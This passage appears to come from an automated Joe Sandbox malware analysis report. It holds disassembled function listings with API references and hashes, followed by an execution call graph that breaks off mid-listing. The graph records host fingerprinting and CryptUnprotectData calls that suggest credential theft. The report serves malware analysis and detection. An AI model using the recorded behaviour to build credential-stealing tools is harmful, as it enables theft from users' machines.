            • Opcode Fuzzy Hash: 7d2a1696d83b644a84543c3be4def7c178c00fd608ba611f73f99065e153f55a
            • Instruction Fuzzy Hash: 3451C072A082069FDB259F94E851B7A73A6EF05320F1C812FE80597391E7B5EC41F790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE8847: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FE638F,?,00000000,-00000008), ref: 00FE88F3
            • GetLastError.KERNEL32 ref: 00FE8CC7
            • __dosmaperr.LIBCMT ref: 00FE8CCE
            • GetLastError.KERNEL32(?,?,?,?), ref: 00FE8D08
            • __dosmaperr.LIBCMT ref: 00FE8D0F
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
            • String ID:
            • API String ID: 1913693674-0
            • Opcode ID: e474d616a6df8e046131d5998953c23f4413ea81173d9e361e2994956814d074
            • Instruction ID: e5e06a6e32476e98413b9747579c50cb3773f3b00c50a03409fcb158420cbc12
            • Opcode Fuzzy Hash: e474d616a6df8e046131d5998953c23f4413ea81173d9e361e2994956814d074
            • Instruction Fuzzy Hash: 2F21F531A00655AFDB20BF67CC40D6BB7AAFF503A47248429F91D97240DF35EC01A7A0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0016e20e090fbfe63388f9b502ea5aef45e43cb5503b59343741ea5e4ac00b6b
            • Instruction ID: d3c72c92030f5c24d61230e1f041c19355c0a84ffa5327e67597946d82a18ecc
            • Opcode Fuzzy Hash: 0016e20e090fbfe63388f9b502ea5aef45e43cb5503b59343741ea5e4ac00b6b
            • Instruction Fuzzy Hash: B0216F72600205AFDB20AF71AC40E6B77AAAF5036571C8537F81BD7351DB35ED05A7A0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 00FE9C01
              • Part of subcall function 00FE8847: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FE638F,?,00000000,-00000008), ref: 00FE88F3
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FE9C39
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FE9C59
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
            • String ID:
            • API String ID: 158306478-0
            • Opcode ID: fe70d0f0fa968a2b4a71dc9ac2c615508007d9e707b6ff84be77e3984f531954
            • Instruction ID: bcf56c112eafd7f15a578f6d617e3ab868897fa41ddc8a12517bf510768095a0
            • Opcode Fuzzy Hash: fe70d0f0fa968a2b4a71dc9ac2c615508007d9e707b6ff84be77e3984f531954
            • Instruction Fuzzy Hash: 2D11C8F29096DA7E672137BB5D8EC6F79DCED853E43210024FC05A6201FEA9DE016671
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD19E3
            • int.LIBCPMT ref: 00FD19F6
              • Part of subcall function 00FD21B2: std::_Lockit::_Lockit.LIBCPMT ref: 00FD21C3
              • Part of subcall function 00FD21B2: std::_Lockit::~_Lockit.LIBCPMT ref: 00FD21DD
            • std::_Facet_Register.LIBCPMT ref: 00FD1A29
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00FD1A3F
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
            • String ID:
            • API String ID: 459529453-0
            • Opcode ID: 81c078cf0444e6c738a47559507dabcc5783bea54df6211fbbfa1215cf102af7
            • Instruction ID: cbb09848e633b0c42f2d4b730652f09b11914aff7a49b2aaba66ad3cb3f738f0
            • Opcode Fuzzy Hash: 81c078cf0444e6c738a47559507dabcc5783bea54df6211fbbfa1215cf102af7
            • Instruction Fuzzy Hash: 3801A732900118BBCB15ABA4DC459AD776AEF50720B29014BF501973D1EE389E41B7D5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD1AD5
            • int.LIBCPMT ref: 00FD1AE8
              • Part of subcall function 00FD21B2: std::_Lockit::_Lockit.LIBCPMT ref: 00FD21C3
              • Part of subcall function 00FD21B2: std::_Lockit::~_Lockit.LIBCPMT ref: 00FD21DD
            • std::_Facet_Register.LIBCPMT ref: 00FD1B1B
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00FD1B31
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
            • String ID:
            • API String ID: 459529453-0
            • Opcode ID: e0c0f6f50d822396ce94e03f8bb6a95331557263834226f383d4c491c6cb5c4a
            • Instruction ID: f94c06038a9fcf4eb044fa5f6e6ff4843a8446e6ac88b006d7d7cde51ff9549b
            • Opcode Fuzzy Hash: e0c0f6f50d822396ce94e03f8bb6a95331557263834226f383d4c491c6cb5c4a
            • Instruction Fuzzy Hash: A5018F76900118ABCB15ABA4DD058ADB76BEF94760B18014BF9029B391FA34AE41F7C4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD1A5C
            • int.LIBCPMT ref: 00FD1A6F
              • Part of subcall function 00FD21B2: std::_Lockit::_Lockit.LIBCPMT ref: 00FD21C3
              • Part of subcall function 00FD21B2: std::_Lockit::~_Lockit.LIBCPMT ref: 00FD21DD
            • std::_Facet_Register.LIBCPMT ref: 00FD1AA2
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00FD1AB8
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
            • String ID:
            • API String ID: 459529453-0
            • Opcode ID: 8db486b7d0c65f27624b570aaf2ed4babd56acebdc796d5a56ce5084b1717c26
            • Instruction ID: c773bbe5e4e7ea5d810ccb60932b13d57ff430cc8187a026c019c7e2189d4885
            • Opcode Fuzzy Hash: 8db486b7d0c65f27624b570aaf2ed4babd56acebdc796d5a56ce5084b1717c26
            • Instruction Fuzzy Hash: 71018F32900118ABCB15AB64DD059AD776BBF90760B18024AF902973D1EF38AE41B7C0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00FEF1AA,00000000,00000001,00000000,00000000,?,00FE749C,00000000,00000000,00000000), ref: 00FF0306
            • GetLastError.KERNEL32(?,00FEF1AA,00000000,00000001,00000000,00000000,?,00FE749C,00000000,00000000,00000000,00000000,00000000,?,00FE7A23,00000000), ref: 00FF0312
              • Part of subcall function 00FF02D8: CloseHandle.KERNEL32(FFFFFFFE,00FF0322,?,00FEF1AA,00000000,00000001,00000000,00000000,?,00FE749C,00000000,00000000,00000000,00000000,00000000), ref: 00FF02E8
            • ___initconout.LIBCMT ref: 00FF0322
              • Part of subcall function 00FF029A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FF02C9,00FEF197,00000000,?,00FE749C,00000000,00000000,00000000,00000000), ref: 00FF02AD
            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00FEF1AA,00000000,00000001,00000000,00000000,?,00FE749C,00000000,00000000,00000000,00000000), ref: 00FF0337
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
            • String ID:
            • API String ID: 2744216297-0
            • Opcode ID: 01ad6c4d2eec0ac2f453adb5234537f12765727ec6bf5a084ec4520777986c2b
            • Instruction ID: 351419653593f0cda48843622965bfb971e41827e19a42a6d4a68a69254c7f98
            • Opcode Fuzzy Hash: 01ad6c4d2eec0ac2f453adb5234537f12765727ec6bf5a084ec4520777986c2b
            • Instruction Fuzzy Hash: 53F0AC36500258BBCF621F95DC089AA7F6AFF497B1B048050FA5D95232DA36C820FBA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD90FF
            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD91B3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 3480331319-1018135373
            • Opcode ID: f038b87bf238b8ba0fcd2079bda0201a7217f45f99c2f225277c0b6e0a627a02
            • Instruction ID: 788272e5b3e8e6af98724c81e8ee0f387126db7cfc97a77fe4f3040fa50f8944
            • Opcode Fuzzy Hash: f038b87bf238b8ba0fcd2079bda0201a7217f45f99c2f225277c0b6e0a627a02
            • Instruction Fuzzy Hash: 93412B34E04209ABCF10DFA9CC84AAE7BB6BF45324F188156E8145B392C775EA01EB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • EncodePointer.KERNEL32(00000000,?), ref: 00FD99F2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID: MOC$RCC
            • API String ID: 2118026453-2084237596
            • Opcode ID: 8f69391b9685e755fa1db722abfec952e710a261567826f721ec65b96feae184
            • Instruction ID: 225ca3ac7c697e3a803d24f9d0fa456d47f27aa31a4393bf904b1792ed240c96
            • Opcode Fuzzy Hash: 8f69391b9685e755fa1db722abfec952e710a261567826f721ec65b96feae184
            • Instruction Fuzzy Hash: 5F414972904209AFCF16DFD8CC81AEEBBB6BF48314F18419AF905A7211D7B99950EB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD1C53
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD1C8B
              • Part of subcall function 00FD4241: _Yarn.LIBCPMT ref: 00FD4260
              • Part of subcall function 00FD4241: _Yarn.LIBCPMT ref: 00FD4284
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
            • String ID: bad locale name
            • API String ID: 1908188788-1405518554
            • Opcode ID: 058db68f65fc2bd1d155e72bdcc438d7c5ed8b139aa5651004aedc3791ebfa65
            • Instruction ID: 88d874c2c7fd17ed7142f0c3fc39a5aee6ae6131140d1cdf9e2f6d5f3d6c94b1
            • Opcode Fuzzy Hash: 058db68f65fc2bd1d155e72bdcc438d7c5ed8b139aa5651004aedc3791ebfa65
            • Instruction Fuzzy Hash: E6F030B1505B409E83349F7A9881457FBE4BE293103548E2FE1DEC3B11D734E504DB6A
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:15.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:9.5%
            Total number of Nodes:433
            Total number of Limit Nodes:23
            execution_graph 10393 41d140 10394 41d14c 10393->10394 10398 41d19f 10393->10398 10399 4392d0 10394->10399 10396 41d1ae 10397 4392d0 RtlAllocateHeap 10396->10397 10397->10398 10400 439315 10399->10400 10401 43935a RtlAllocateHeap 10399->10401 10400->10401 10401->10396 10402 41e0c0 10403 41e176 RtlExpandEnvironmentStrings 10402->10403 10404 41e13e 10402->10404 10405 41e1bb 10403->10405 10404->10403 10406 4392d0 RtlAllocateHeap 10405->10406 10407 41e1cb RtlExpandEnvironmentStrings 10406->10407 10408 41e258 10407->10408 10409 4392d0 RtlAllocateHeap 10408->10409 10410 41e2f3 10409->10410 10410->10410 10413 43e5b0 10410->10413 10412 41e364 10414 43e5d0 10413->10414 10415 4392d0 RtlAllocateHeap 10414->10415 10416 43e5f4 10415->10416 10417 43e75e 10416->10417 10419 43b550 LdrInitializeThunk 10416->10419 10417->10412 10419->10417 10420 422840 10421 422921 10420->10421 10448 43ed00 10421->10448 10424 4229ab 10428 4392d0 RtlAllocateHeap 10424->10428 10430 422ca2 10424->10430 10432 422aa8 10424->10432 10434 422c6d 10424->10434 10431 4229d4 10428->10431 10430->10434 10438 422dc7 10430->10438 10439 4392d0 RtlAllocateHeap 10430->10439 10460 43f8a0 10431->10460 10432->10430 10432->10434 10432->10438 10468 43b550 LdrInitializeThunk 10432->10468 10433 4230f0 10435 4392d0 RtlAllocateHeap 10433->10435 10441 423109 RtlExpandEnvironmentStrings 10435->10441 10437 4392d0 RtlAllocateHeap 10437->10438 10438->10433 10438->10434 10438->10437 10469 43e3d0 10438->10469 10475 43e7b0 10438->10475 10479 43e8d0 10438->10479 10485 4255b0 10438->10485 10439->10438 10444 42320f 10441->10444 10445 4392d0 RtlAllocateHeap 10444->10445 10446 42355a RtlExpandEnvironmentStrings 10445->10446 10447 43e3d0 2 API calls 10446->10447 10447->10434 10450 43ed20 10448->10450 10449 42297c 10449->10424 10449->10430 10449->10432 10449->10434 10452 43f190 10449->10452 10450->10449 10490 43b550 LdrInitializeThunk 10450->10490 10454 43f1ed 10452->10454 10453 43f25e 10455 4392d0 RtlAllocateHeap 10453->10455 10459 43f36e 10453->10459 10454->10453 10491 43b550 LdrInitializeThunk 10454->10491 10457 43f29e 10455->10457 10457->10459 10492 43b550 LdrInitializeThunk 10457->10492 10459->10424 10462 43f8c0 10460->10462 10461 43f9ae 10463 4392d0 RtlAllocateHeap 10461->10463 10466 43fac2 10461->10466 10462->10461 10493 43b550 LdrInitializeThunk 10462->10493 10464 43f9f3 10463->10464 10464->10466 10494 43b550 LdrInitializeThunk 10464->10494 10466->10432 10468->10432 10470 43e3f0 10469->10470 10471 4392d0 RtlAllocateHeap 10470->10471 10473 43e410 10471->10473 10472 43e55e 10472->10438 10473->10472 10495 43b550 LdrInitializeThunk 10473->10495 10477 43e80d 10475->10477 10476 43e87e 10476->10438 10477->10476 10496 43b550 LdrInitializeThunk 10477->10496 10482 43e92d 10479->10482 10480 43e99e 10481 43ea9e 10480->10481 10498 43b550 LdrInitializeThunk 10480->10498 10481->10438 10482->10480 10497 43b550 LdrInitializeThunk 10482->10497 10486 425721 10485->10486 10487 4255df 10485->10487 10486->10438 10487->10486 10488 4392d0 RtlAllocateHeap 10487->10488 10499 425b50 10487->10499 10488->10487 10490->10449 10491->10453 10492->10459 10493->10461 10494->10466 10495->10472 10496->10476 10497->10480 10498->10481 10502 425b66 10499->10502 10500 425bcb 10500->10487 10501 425b50 RtlAllocateHeap 10501->10502 10502->10500 10502->10501 10503 4392d0 RtlAllocateHeap 10502->10503 10503->10502 10504 41b4c7 10505 41b4cc 10504->10505 10508 41b800 10505->10508 10509 43e3d0 2 API calls 10508->10509 10510 41b856 10509->10510 10511 4186c8 10512 418738 10511->10512 10512->10512 10513 41b800 2 API calls 10512->10513 10514 418789 10513->10514 10515 4164cb 10516 4392d0 RtlAllocateHeap 10515->10516 10517 4164db 10516->10517 10518 43e8d0 LdrInitializeThunk 10517->10518 10519 4164f5 10518->10519 10520 4091d0 10521 4091e0 10520->10521 10523 4091f6 GetConsoleWindow 10521->10523 10524 4091e9 10521->10524 10522 409230 ExitProcess 10523->10524 10524->10522 10525 41ead0 10526 41eb92 10525->10526 10527 41ebe9 RtlExpandEnvironmentStrings 10525->10527 10526->10527 10528 41ec2b 10527->10528 10529 4392d0 RtlAllocateHeap 10528->10529 10530 41ec3b RtlExpandEnvironmentStrings 10529->10530 10531 41eca3 10530->10531 10534 4185d0 10531->10534 10535 4185f0 10534->10535 10535->10535 10536 4185fb RtlExpandEnvironmentStrings 10535->10536 10537 418618 10536->10537 10538 4392d0 RtlAllocateHeap 10537->10538 10539 418628 RtlExpandEnvironmentStrings 10538->10539 10540 43e5b0 2 API calls 10539->10540 10541 418649 10540->10541 10547 41ad53 10548 41adb1 10547->10548 10549 4392d0 RtlAllocateHeap 10548->10549 10550 41ae53 10549->10550 10550->10550 10551 43e5b0 2 API calls 10550->10551 10552 41aebf 10551->10552 10553 415e59 10554 415e7b 10553->10554 10555 4392d0 RtlAllocateHeap 10554->10555 10556 415ea9 10555->10556 10557 4392d0 RtlAllocateHeap 10556->10557 10558 415f78 10557->10558 10558->10558 10559 43e5b0 2 API calls 10558->10559 10560 415ff1 10559->10560 10565 427059 10566 42706c 10565->10566 10567 42747e GetComputerNameExA 10566->10567 10569 4274e6 GetComputerNameExA 10567->10569 10570 4275ec 10569->10570 10571 41cadc 10575 41cd80 10571->10575 10591 420ac0 10571->10591 10572 41caf7 10576 41cd96 10575->10576 10583 41ce50 10575->10583 10577 4392d0 RtlAllocateHeap 10576->10577 10576->10583 10578 41cea7 10577->10578 10578->10578 10579 43e3d0 2 API calls 10578->10579 10580 41cf22 10579->10580 10581 4392d0 RtlAllocateHeap 10580->10581 10580->10583 10582 41cf2f 10581->10582 10584 43e8d0 LdrInitializeThunk 10582->10584 10583->10572 10585 41cf43 10584->10585 10586 4392d0 RtlAllocateHeap 10585->10586 10587 41cf9f 10585->10587 10589 41cfb2 10586->10589 10587->10583 10601 43b550 LdrInitializeThunk 10587->10601 10589->10589 10595 4092c0 10589->10595 10592 420c5a 10591->10592 10593 420ad9 10591->10593 10592->10572 10594 4392d0 RtlAllocateHeap 10593->10594 10594->10592 10596 4093ea 10595->10596 10598 4092e0 10595->10598 10597 4392d0 RtlAllocateHeap 10596->10597 10600 40932a 10597->10600 10599 4392d0 RtlAllocateHeap 10598->10599 10599->10600 10600->10587 10601->10583 10602 412feb 10603 412ff5 10602->10603 10608 415bc0 10603->10608 10605 413011 10606 409cd0 RtlAllocateHeap 10605->10606 10607 41301c 10606->10607 10609 415be0 10608->10609 10609->10609 10610 415beb RtlExpandEnvironmentStrings 10609->10610 10611 415c0e 10610->10611 10612 4392d0 RtlAllocateHeap 10611->10612 10613 415c1e RtlExpandEnvironmentStrings 10612->10613 10614 415c9f 10613->10614 10615 4392d0 RtlAllocateHeap 10614->10615 10616 415d37 10615->10616 10616->10616 10617 43e3d0 2 API calls 10616->10617 10618 415dba 10617->10618 10619 41abf0 10620 41abfe 10619->10620 10624 41ac40 10619->10624 10621 4392d0 RtlAllocateHeap 10620->10621 10622 41ac54 10621->10622 10622->10622 10622->10624 10625 4187f0 10622->10625 10626 4188b7 10625->10626 10639 4155e0 10626->10639 10628 418910 10629 4155e0 RtlAllocateHeap LdrInitializeThunk 10628->10629 10630 418a5d 10629->10630 10631 4155e0 RtlAllocateHeap LdrInitializeThunk 10630->10631 10632 418c30 10631->10632 10633 4155e0 RtlAllocateHeap LdrInitializeThunk 10632->10633 10634 418dcf 10633->10634 10635 4155e0 RtlAllocateHeap LdrInitializeThunk 10634->10635 10636 418f3c 10635->10636 10637 4155e0 RtlAllocateHeap LdrInitializeThunk 10636->10637 10638 4190b5 10637->10638 10640 415600 10639->10640 10641 4392d0 RtlAllocateHeap 10640->10641 10642 41564d 10641->10642 10642->10642 10643 43e3d0 2 API calls 10642->10643 10644 4156be 10643->10644 10650 411a72 10651 411a81 10650->10651 10652 4185d0 4 API calls 10651->10652 10653 411aa1 10652->10653 10656 409cd0 10653->10656 10655 411aab 10657 409d21 10656->10657 10658 409ce5 10656->10658 10657->10655 10659 4392d0 RtlAllocateHeap 10658->10659 10659->10657 10660 424478 10661 424490 10660->10661 10662 4392d0 RtlAllocateHeap 10661->10662 10663 4245a8 10662->10663 10663->10663 10664 43e3d0 2 API calls 10663->10664 10666 42465c 10664->10666 10665 4392d0 RtlAllocateHeap 10665->10666 10666->10665 10667 43e3d0 2 API calls 10666->10667 10667->10666 10668 42b978 SysAllocString 10669 42b9ea 10668->10669 10675 420efe 10676 4210c7 10675->10676 10677 43ed00 LdrInitializeThunk 10676->10677 10678 421121 10677->10678 10679 4133fc 10684 415470 10679->10684 10681 413419 10682 415470 RtlAllocateHeap 10681->10682 10683 41343d 10682->10683 10685 4154a0 10684->10685 10686 4392d0 RtlAllocateHeap 10685->10686 10687 4154c0 10686->10687 10688 4392d0 RtlAllocateHeap 10687->10688 10689 415560 10688->10689 10689->10681 10695 418080 10696 418151 10695->10696 10697 4392d0 RtlAllocateHeap 10696->10697 10698 418217 10697->10698 10699 4392d0 RtlAllocateHeap 10698->10699 10700 418402 10699->10700 10701 437581 10704 43d8f0 10701->10704 10703 4375a5 GetVolumeInformationW 10705 416682 10706 4392d0 RtlAllocateHeap 10705->10706 10708 4166a1 10706->10708 10707 416974 CryptUnprotectData 10708->10707 10709 415b82 10710 43e8d0 LdrInitializeThunk 10709->10710 10711 415b8c 10710->10711 10712 43e8d0 LdrInitializeThunk 10711->10712 10713 415b99 10712->10713 10714 43aa87 10715 43aa8a LoadLibraryW 10714->10715 10717 410a86 10718 410aa5 10717->10718 10719 409cd0 RtlAllocateHeap 10718->10719 10720 410ab2 10719->10720 10721 41a48a 10722 41a4a4 10721->10722 10723 4392d0 RtlAllocateHeap 10722->10723 10724 41a614 10723->10724 10725 43e3d0 2 API calls 10724->10725 10726 41a66e 10725->10726 10732 428410 10733 428417 10732->10733 10734 428527 GetPhysicallyInstalledSystemMemory 10733->10734 10735 428542 10734->10735 10735->10735 10736 415a95 10737 415a9e 10736->10737 10739 415b4e 10737->10739 10740 43b550 LdrInitializeThunk 10737->10740 10740->10739 10741 436b16 10742 43e3d0 2 API calls 10741->10742 10743 436b46 10742->10743 10749 42161e 10750 421632 10749->10750 10751 